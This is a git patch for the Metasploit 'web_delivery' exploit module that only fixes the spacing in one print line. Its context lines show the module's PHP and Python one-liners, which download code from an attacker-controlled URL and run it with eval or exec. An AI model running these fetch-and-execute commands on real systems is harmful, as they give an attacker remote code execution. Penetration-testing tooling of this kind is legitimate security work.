From ffe77c484e27fa3e3de16878e2fa375761e33b5f Mon Sep 17 00:00:00 2001 From: Swiftb0y Date: Mon, 20 Mar 2017 16:37:35 +0100 Subject: [PATCH] fixed spacing --- modules/exploits/multi/script/web_delivery.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index f5031d8576..16f37b137f 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote when 'PHP' print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") when 'Python' - print_line("python 2:") + print_line("python 2:") print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("Python 3:") print_line("python3 -c \"import urllib.request; r = urllib.request.urlopen('#{url}'); exec(r.read());\"")